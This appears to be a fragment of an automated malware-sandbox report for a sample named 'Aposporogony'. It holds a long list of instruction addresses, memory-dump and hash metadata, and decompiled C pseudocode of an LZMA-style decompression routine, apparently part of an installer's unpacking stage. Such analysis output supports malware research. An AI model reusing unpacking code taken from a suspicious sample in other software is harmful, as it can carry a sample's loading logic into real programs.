                                                                                                                                                                                      0x00407029
                                                                                                                                                                                      0x0040702d
                                                                                                                                                                                      0x00407030
                                                                                                                                                                                      0x00407036
                                                                                                                                                                                      0x00407038
                                                                                                                                                                                      0x00407038
                                                                                                                                                                                      0x00407038
                                                                                                                                                                                      0x0040703b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406de9
                                                                                                                                                                                      0x00406de9
                                                                                                                                                                                      0x00406dec
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407128
                                                                                                                                                                                      0x0040712c
                                                                                                                                                                                      0x0040714e
                                                                                                                                                                                      0x00407151
                                                                                                                                                                                      0x0040715b
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x0040712e
                                                                                                                                                                                      0x00407131
                                                                                                                                                                                      0x00407135
                                                                                                                                                                                      0x00407138
                                                                                                                                                                                      0x00407138
                                                                                                                                                                                      0x0040713b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004071e5
                                                                                                                                                                                      0x004071e9
                                                                                                                                                                                      0x00407207
                                                                                                                                                                                      0x00407207
                                                                                                                                                                                      0x00407207
                                                                                                                                                                                      0x0040720e
                                                                                                                                                                                      0x00407215
                                                                                                                                                                                      0x0040721c
                                                                                                                                                                                      0x0040721c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040721c
                                                                                                                                                                                      0x004071eb
                                                                                                                                                                                      0x004071ee
                                                                                                                                                                                      0x004071f1
                                                                                                                                                                                      0x004071f4
                                                                                                                                                                                      0x004071fb
                                                                                                                                                                                      0x0040713f
                                                                                                                                                                                      0x0040713f
                                                                                                                                                                                      0x00407142
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004072d6
                                                                                                                                                                                      0x004072d9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406f10
                                                                                                                                                                                      0x00406f12
                                                                                                                                                                                      0x00406f19
                                                                                                                                                                                      0x00406f1a
                                                                                                                                                                                      0x00406f1c
                                                                                                                                                                                      0x00406f1f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406f27
                                                                                                                                                                                      0x00406f2a
                                                                                                                                                                                      0x00406f2d
                                                                                                                                                                                      0x00406f2f
                                                                                                                                                                                      0x00406f31
                                                                                                                                                                                      0x00406f31
                                                                                                                                                                                      0x00406f32
                                                                                                                                                                                      0x00406f35
                                                                                                                                                                                      0x00406f3c
                                                                                                                                                                                      0x00406f3f
                                                                                                                                                                                      0x00406f4d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407223
                                                                                                                                                                                      0x00407223
                                                                                                                                                                                      0x00407226
                                                                                                                                                                                      0x0040722d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407232
                                                                                                                                                                                      0x00407232
                                                                                                                                                                                      0x00407236
                                                                                                                                                                                      0x0040736e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040736e
                                                                                                                                                                                      0x0040723c
                                                                                                                                                                                      0x0040723f
                                                                                                                                                                                      0x00407242
                                                                                                                                                                                      0x00407246
                                                                                                                                                                                      0x00407249
                                                                                                                                                                                      0x0040724f
                                                                                                                                                                                      0x00407251
                                                                                                                                                                                      0x00407251
                                                                                                                                                                                      0x00407251
                                                                                                                                                                                      0x00407254
                                                                                                                                                                                      0x00407257
                                                                                                                                                                                      0x00407257
                                                                                                                                                                                      0x00407257
                                                                                                                                                                                      0x00407257
                                                                                                                                                                                      0x0040725a
                                                                                                                                                                                      0x0040725a
                                                                                                                                                                                      0x0040725e
                                                                                                                                                                                      0x004072be
                                                                                                                                                                                      0x004072c1
                                                                                                                                                                                      0x004072c6
                                                                                                                                                                                      0x004072c7
                                                                                                                                                                                      0x004072c9
                                                                                                                                                                                      0x004072cb
                                                                                                                                                                                      0x004072ce
                                                                                                                                                                                      0x004071da
                                                                                                                                                                                      0x004071da
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004071da
                                                                                                                                                                                      0x00407260
                                                                                                                                                                                      0x00407266
                                                                                                                                                                                      0x00407269
                                                                                                                                                                                      0x0040726c
                                                                                                                                                                                      0x0040726f
                                                                                                                                                                                      0x00407272
                                                                                                                                                                                      0x00407275
                                                                                                                                                                                      0x00407278
                                                                                                                                                                                      0x0040727b
                                                                                                                                                                                      0x0040727e
                                                                                                                                                                                      0x00407281
                                                                                                                                                                                      0x0040729a
                                                                                                                                                                                      0x0040729d
                                                                                                                                                                                      0x004072a0
                                                                                                                                                                                      0x004072a3
                                                                                                                                                                                      0x004072a7
                                                                                                                                                                                      0x004072a9
                                                                                                                                                                                      0x004072a9
                                                                                                                                                                                      0x004072aa
                                                                                                                                                                                      0x004072ad
                                                                                                                                                                                      0x00407283
                                                                                                                                                                                      0x00407283
                                                                                                                                                                                      0x0040728b
                                                                                                                                                                                      0x00407290
                                                                                                                                                                                      0x00407292
                                                                                                                                                                                      0x00407295
                                                                                                                                                                                      0x00407295
                                                                                                                                                                                      0x004072b0
                                                                                                                                                                                      0x004072b7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004072b9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004072b9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406f55
                                                                                                                                                                                      0x00406f58
                                                                                                                                                                                      0x00406f8e
                                                                                                                                                                                      0x004070be
                                                                                                                                                                                      0x004070be
                                                                                                                                                                                      0x004070be
                                                                                                                                                                                      0x004070be
                                                                                                                                                                                      0x004070c1
                                                                                                                                                                                      0x004070c1
                                                                                                                                                                                      0x004070c4
                                                                                                                                                                                      0x004070c6
                                                                                                                                                                                      0x00407350
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407350
                                                                                                                                                                                      0x004070cc
                                                                                                                                                                                      0x004070cf
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070d5
                                                                                                                                                                                      0x004070d9
                                                                                                                                                                                      0x004070dc
                                                                                                                                                                                      0x004070dc
                                                                                                                                                                                      0x004070dc
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070dc
                                                                                                                                                                                      0x00406f5a
                                                                                                                                                                                      0x00406f5c
                                                                                                                                                                                      0x00406f5e
                                                                                                                                                                                      0x00406f60
                                                                                                                                                                                      0x00406f63
                                                                                                                                                                                      0x00406f64
                                                                                                                                                                                      0x00406f66
                                                                                                                                                                                      0x00406f68
                                                                                                                                                                                      0x00406f6b
                                                                                                                                                                                      0x00406f6e
                                                                                                                                                                                      0x00406f84
                                                                                                                                                                                      0x00406f89
                                                                                                                                                                                      0x00406fc1
                                                                                                                                                                                      0x00406fc1
                                                                                                                                                                                      0x00406fc5
                                                                                                                                                                                      0x00406ff1
                                                                                                                                                                                      0x00406ff3
                                                                                                                                                                                      0x00406ffa
                                                                                                                                                                                      0x00406ffd
                                                                                                                                                                                      0x00407000
                                                                                                                                                                                      0x00407000
                                                                                                                                                                                      0x00407005
                                                                                                                                                                                      0x00407005
                                                                                                                                                                                      0x00407007
                                                                                                                                                                                      0x0040700a
                                                                                                                                                                                      0x00407011
                                                                                                                                                                                      0x00407014
                                                                                                                                                                                      0x00407041
                                                                                                                                                                                      0x00407041
                                                                                                                                                                                      0x00407044
                                                                                                                                                                                      0x00407047
                                                                                                                                                                                      0x004070bb
                                                                                                                                                                                      0x004070bb
                                                                                                                                                                                      0x004070bb
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070bb
                                                                                                                                                                                      0x00407049
                                                                                                                                                                                      0x0040704f
                                                                                                                                                                                      0x00407052
                                                                                                                                                                                      0x00407055
                                                                                                                                                                                      0x00407058
                                                                                                                                                                                      0x0040705b
                                                                                                                                                                                      0x0040705e
                                                                                                                                                                                      0x00407061
                                                                                                                                                                                      0x00407064
                                                                                                                                                                                      0x00407067
                                                                                                                                                                                      0x0040706a
                                                                                                                                                                                      0x00407083
                                                                                                                                                                                      0x00407085
                                                                                                                                                                                      0x00407088
                                                                                                                                                                                      0x00407089
                                                                                                                                                                                      0x0040708c
                                                                                                                                                                                      0x0040708e
                                                                                                                                                                                      0x00407091
                                                                                                                                                                                      0x00407093
                                                                                                                                                                                      0x00407095
                                                                                                                                                                                      0x00407098
                                                                                                                                                                                      0x0040709a
                                                                                                                                                                                      0x0040709d
                                                                                                                                                                                      0x004070a1
                                                                                                                                                                                      0x004070a3
                                                                                                                                                                                      0x004070a3
                                                                                                                                                                                      0x004070a4
                                                                                                                                                                                      0x004070a7
                                                                                                                                                                                      0x004070aa
                                                                                                                                                                                      0x0040706c
                                                                                                                                                                                      0x0040706c
                                                                                                                                                                                      0x00407074
                                                                                                                                                                                      0x00407079
                                                                                                                                                                                      0x0040707b
                                                                                                                                                                                      0x0040707e
                                                                                                                                                                                      0x0040707e
                                                                                                                                                                                      0x004070ad
                                                                                                                                                                                      0x004070b4
                                                                                                                                                                                      0x0040703e
                                                                                                                                                                                      0x0040703e
                                                                                                                                                                                      0x0040703e
                                                                                                                                                                                      0x0040703e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070b6
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070b6
                                                                                                                                                                                      0x004070b4
                                                                                                                                                                                      0x00406fc7
                                                                                                                                                                                      0x00406fca
                                                                                                                                                                                      0x00406fcc
                                                                                                                                                                                      0x00406fcf
                                                                                                                                                                                      0x00406fd2
                                                                                                                                                                                      0x00406fd5
                                                                                                                                                                                      0x00406fd7
                                                                                                                                                                                      0x00406fda
                                                                                                                                                                                      0x00406fdd
                                                                                                                                                                                      0x00406fdd
                                                                                                                                                                                      0x00406fe0
                                                                                                                                                                                      0x00406fe0
                                                                                                                                                                                      0x00406fe3
                                                                                                                                                                                      0x00406fea
                                                                                                                                                                                      0x00406fbe
                                                                                                                                                                                      0x00406fbe
                                                                                                                                                                                      0x00406fbe
                                                                                                                                                                                      0x00406fbe
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406fec
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406fec
                                                                                                                                                                                      0x00406fea
                                                                                                                                                                                      0x00406f70
                                                                                                                                                                                      0x00406f73
                                                                                                                                                                                      0x00406f75
                                                                                                                                                                                      0x00406f78
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406cd7
                                                                                                                                                                                      0x00406cd7
                                                                                                                                                                                      0x00406cdb
                                                                                                                                                                                      0x00407320
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407320
                                                                                                                                                                                      0x00406ce1
                                                                                                                                                                                      0x00406ce4
                                                                                                                                                                                      0x00406ce7
                                                                                                                                                                                      0x00406cea
                                                                                                                                                                                      0x00406ced
                                                                                                                                                                                      0x00406cf0
                                                                                                                                                                                      0x00406cf3
                                                                                                                                                                                      0x00406cf5
                                                                                                                                                                                      0x00406cf8
                                                                                                                                                                                      0x00406cfb
                                                                                                                                                                                      0x00406cfe
                                                                                                                                                                                      0x00406d00
                                                                                                                                                                                      0x00406d00
                                                                                                                                                                                      0x00406d00
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406e62
                                                                                                                                                                                      0x00406e62
                                                                                                                                                                                      0x00406e66
                                                                                                                                                                                      0x0040732c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040732c
                                                                                                                                                                                      0x00406e6c
                                                                                                                                                                                      0x00406e6f
                                                                                                                                                                                      0x00406e72
                                                                                                                                                                                      0x00406e75
                                                                                                                                                                                      0x00406e77
                                                                                                                                                                                      0x00406e77
                                                                                                                                                                                      0x00406e77
                                                                                                                                                                                      0x00406e7a
                                                                                                                                                                                      0x00406e7d
                                                                                                                                                                                      0x00406e80
                                                                                                                                                                                      0x00406e83
                                                                                                                                                                                      0x00406e86
                                                                                                                                                                                      0x00406e89
                                                                                                                                                                                      0x00406e8a
                                                                                                                                                                                      0x00406e8c
                                                                                                                                                                                      0x00406e8c
                                                                                                                                                                                      0x00406e8c
                                                                                                                                                                                      0x00406e8f
                                                                                                                                                                                      0x00406e92
                                                                                                                                                                                      0x00406e95
                                                                                                                                                                                      0x00406e98
                                                                                                                                                                                      0x00406e98
                                                                                                                                                                                      0x00406e98
                                                                                                                                                                                      0x00406e9b
                                                                                                                                                                                      0x00406e9d
                                                                                                                                                                                      0x00406e9d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070df
                                                                                                                                                                                      0x004070df
                                                                                                                                                                                      0x004070df
                                                                                                                                                                                      0x004070e3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070e9
                                                                                                                                                                                      0x004070ec
                                                                                                                                                                                      0x004070ef
                                                                                                                                                                                      0x004070f2
                                                                                                                                                                                      0x004070f4
                                                                                                                                                                                      0x004070f4
                                                                                                                                                                                      0x004070f4
                                                                                                                                                                                      0x004070f7
                                                                                                                                                                                      0x004070fa
                                                                                                                                                                                      0x004070fd
                                                                                                                                                                                      0x00407100
                                                                                                                                                                                      0x00407103
                                                                                                                                                                                      0x00407106
                                                                                                                                                                                      0x00407107
                                                                                                                                                                                      0x00407109
                                                                                                                                                                                      0x00407109
                                                                                                                                                                                      0x00407109
                                                                                                                                                                                      0x0040710c
                                                                                                                                                                                      0x0040710f
                                                                                                                                                                                      0x00407112
                                                                                                                                                                                      0x00407115
                                                                                                                                                                                      0x00407118
                                                                                                                                                                                      0x0040711c
                                                                                                                                                                                      0x0040711e
                                                                                                                                                                                      0x00407121
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407123
                                                                                                                                                                                      0x00406ea0
                                                                                                                                                                                      0x00406ea0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406ea0
                                                                                                                                                                                      0x00407121
                                                                                                                                                                                      0x00407356
                                                                                                                                                                                      0x00407378
                                                                                                                                                                                      0x0040737e
                                                                                                                                                                                      0x00407380
                                                                                                                                                                                      0x00407387
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406985
                                                                                                                                                                                      0x0040738d
                                                                                                                                                                                      0x0040738d
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                                                                                                      • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                                                                                                      • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 98%
                                                                                                                                                                                      			E00406D91() {
                                                                                                                                                                                      				signed int _t539;
                                                                                                                                                                                      				unsigned short _t540;
                                                                                                                                                                                      				signed int _t541;
                                                                                                                                                                                      				void _t542;
                                                                                                                                                                                      				signed int _t543;
                                                                                                                                                                                      				signed int _t544;
                                                                                                                                                                                      				signed int _t573;
                                                                                                                                                                                      				signed int _t576;
                                                                                                                                                                                      				signed int _t597;
                                                                                                                                                                                      				signed int* _t614;
                                                                                                                                                                                      				void* _t621;
                                                                                                                                                                                      
                                                                                                                                                                                      				L0:
                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                      					L0:
                                                                                                                                                                                      					if( *(_t621 - 0x40) != 1) {
                                                                                                                                                                                      						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                                                                                                                                                                                      						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                                                                                                                                                                                      						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                                                                                                                                                                                      						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                                                                                                                                                                                      						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                                                                                                                                                                                      						_t539 =  *(_t621 - 4) + 0x664;
                                                                                                                                                                                      						 *(_t621 - 0x58) = _t539;
                                                                                                                                                                                      						goto L68;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						 *(__ebp - 0x84) = 8;
                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                      							L132:
                                                                                                                                                                                      							 *(_t621 - 0x54) = _t614;
                                                                                                                                                                                      							while(1) {
                                                                                                                                                                                      								L133:
                                                                                                                                                                                      								_t540 =  *_t614;
                                                                                                                                                                                      								_t597 = _t540 & 0x0000ffff;
                                                                                                                                                                                      								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                                                                                                                                                      								if( *(_t621 - 0xc) >= _t573) {
                                                                                                                                                                                      									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                                                                                                                                                      									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                                                                                                                                                      									 *(_t621 - 0x40) = 1;
                                                                                                                                                                                      									_t541 = _t540 - (_t540 >> 5);
                                                                                                                                                                                      									 *_t614 = _t541;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									 *(_t621 - 0x10) = _t573;
                                                                                                                                                                                      									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                                                                                                                      									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								if( *(_t621 - 0x10) >= 0x1000000) {
                                                                                                                                                                                      									goto L139;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								L137:
                                                                                                                                                                                      								if( *(_t621 - 0x6c) == 0) {
                                                                                                                                                                                      									 *(_t621 - 0x88) = 5;
                                                                                                                                                                                      									L170:
                                                                                                                                                                                      									_t576 = 0x22;
                                                                                                                                                                                      									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                                                                                                                                                                                      									_t544 = 0;
                                                                                                                                                                                      									L172:
                                                                                                                                                                                      									return _t544;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                                                                                                                                                                                      								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                                                                                                                      								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                                                                                                                      								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                                                                                                                                                      								L139:
                                                                                                                                                                                      								_t542 =  *(_t621 - 0x84);
                                                                                                                                                                                      								while(1) {
                                                                                                                                                                                      									 *(_t621 - 0x88) = _t542;
                                                                                                                                                                                      									while(1) {
                                                                                                                                                                                      										L1:
                                                                                                                                                                                      										_t543 =  *(_t621 - 0x88);
                                                                                                                                                                                      										if(_t543 > 0x1c) {
                                                                                                                                                                                      											break;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										switch( *((intOrPtr*)(_t543 * 4 +  &M00407395))) {
                                                                                                                                                                                      											case 0:
                                                                                                                                                                                      												if( *(_t621 - 0x6c) == 0) {
                                                                                                                                                                                      													goto L170;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                                                                                                                      												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                                                                                                                      												_t543 =  *( *(_t621 - 0x70));
                                                                                                                                                                                      												if(_t543 > 0xe1) {
                                                                                                                                                                                      													goto L171;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												_t547 = _t543 & 0x000000ff;
                                                                                                                                                                                      												_push(0x2d);
                                                                                                                                                                                      												asm("cdq");
                                                                                                                                                                                      												_pop(_t578);
                                                                                                                                                                                      												_push(9);
                                                                                                                                                                                      												_pop(_t579);
                                                                                                                                                                                      												_t617 = _t547 / _t578;
                                                                                                                                                                                      												_t549 = _t547 % _t578 & 0x000000ff;
                                                                                                                                                                                      												asm("cdq");
                                                                                                                                                                                      												_t612 = _t549 % _t579 & 0x000000ff;
                                                                                                                                                                                      												 *(_t621 - 0x3c) = _t612;
                                                                                                                                                                                      												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                                                                                                                                                                                      												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                                                                                                                                                                                      												_t620 = (0x300 << _t612 + _t617) + 0x736;
                                                                                                                                                                                      												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                                                                                                                                                                                      													L10:
                                                                                                                                                                                      													if(_t620 == 0) {
                                                                                                                                                                                      														L12:
                                                                                                                                                                                      														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                                                                                                                                                                                      														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                                                                                                                      														goto L15;
                                                                                                                                                                                      													} else {
                                                                                                                                                                                      														goto L11;
                                                                                                                                                                                      													}
                                                                                                                                                                                      													do {
                                                                                                                                                                                      														L11:
                                                                                                                                                                                      														_t620 = _t620 - 1;
                                                                                                                                                                                      														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                                                                                                                                                                                      													} while (_t620 != 0);
                                                                                                                                                                                      													goto L12;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												if( *(_t621 - 4) != 0) {
                                                                                                                                                                                      													GlobalFree( *(_t621 - 4));
                                                                                                                                                                                      												}
                                                                                                                                                                                      												_t543 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                                                                                      												 *(_t621 - 4) = _t543;
                                                                                                                                                                                      												if(_t543 == 0) {
                                                                                                                                                                                      													goto L171;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                                                                                                                                                                                      													goto L10;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											case 1:
                                                                                                                                                                                      												L13:
                                                                                                                                                                                      												__eflags =  *(_t621 - 0x6c);
                                                                                                                                                                                      												if( *(_t621 - 0x6c) == 0) {
                                                                                                                                                                                      													 *(_t621 - 0x88) = 1;
                                                                                                                                                                                      													goto L170;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                                                                                                                      												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                                                                                                                                                                                      												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                                                                                                                      												_t45 = _t621 - 0x48;
                                                                                                                                                                                      												 *_t45 =  *(_t621 - 0x48) + 1;
                                                                                                                                                                                      												__eflags =  *_t45;
                                                                                                                                                                                      												L15:
                                                                                                                                                                                      												if( *(_t621 - 0x48) < 4) {
                                                                                                                                                                                      													goto L13;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												_t555 =  *(_t621 - 0x40);
                                                                                                                                                                                      												if(_t555 ==  *(_t621 - 0x74)) {
                                                                                                                                                                                      													L20:
                                                                                                                                                                                      													 *(_t621 - 0x48) = 5;
                                                                                                                                                                                      													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                                                                                                                                                                                      													goto L23;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												 *(_t621 - 0x74) = _t555;
                                                                                                                                                                                      												if( *(_t621 - 8) != 0) {
                                                                                                                                                                                      													GlobalFree( *(_t621 - 8));
                                                                                                                                                                                      												}
                                                                                                                                                                                      												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                                                                                                                                                                                      												 *(_t621 - 8) = _t543;
                                                                                                                                                                                      												if(_t543 == 0) {
                                                                                                                                                                                      													goto L171;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													goto L20;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											case 2:
                                                                                                                                                                                      												L24:
                                                                                                                                                                                      												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                                                                                                                                                                                      												 *(_t621 - 0x84) = 6;
                                                                                                                                                                                      												 *(_t621 - 0x4c) = _t562;
                                                                                                                                                                                      												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                                                                                                                                                                                      												goto L132;
                                                                                                                                                                                      											case 3:
                                                                                                                                                                                      												L21:
                                                                                                                                                                                      												__eflags =  *(_t621 - 0x6c);
                                                                                                                                                                                      												if( *(_t621 - 0x6c) == 0) {
                                                                                                                                                                                      													 *(_t621 - 0x88) = 3;
                                                                                                                                                                                      													goto L170;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                                                                                                                      												_t67 = _t621 - 0x70;
                                                                                                                                                                                      												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                                                                                                                                                                                      												__eflags =  *_t67;
                                                                                                                                                                                      												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                                                                                                                                                      												L23:
                                                                                                                                                                                      												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                                                                                                                                                                                      												if( *(_t621 - 0x48) != 0) {
                                                                                                                                                                                      													goto L21;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												goto L24;
                                                                                                                                                                                      											case 4:
                                                                                                                                                                                      												L133:
                                                                                                                                                                                      												_t540 =  *_t614;
                                                                                                                                                                                      												_t597 = _t540 & 0x0000ffff;
                                                                                                                                                                                      												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                                                                                                                                                      												if( *(_t621 - 0xc) >= _t573) {
                                                                                                                                                                                      													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                                                                                                                                                      													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                                                                                                                                                      													 *(_t621 - 0x40) = 1;
                                                                                                                                                                                      													_t541 = _t540 - (_t540 >> 5);
                                                                                                                                                                                      													 *_t614 = _t541;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													 *(_t621 - 0x10) = _t573;
                                                                                                                                                                                      													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                                                                                                                      													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												if( *(_t621 - 0x10) >= 0x1000000) {
                                                                                                                                                                                      													goto L139;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											case 5:
                                                                                                                                                                                      												goto L137;
                                                                                                                                                                                      											case 6:
                                                                                                                                                                                      												__edx = 0;
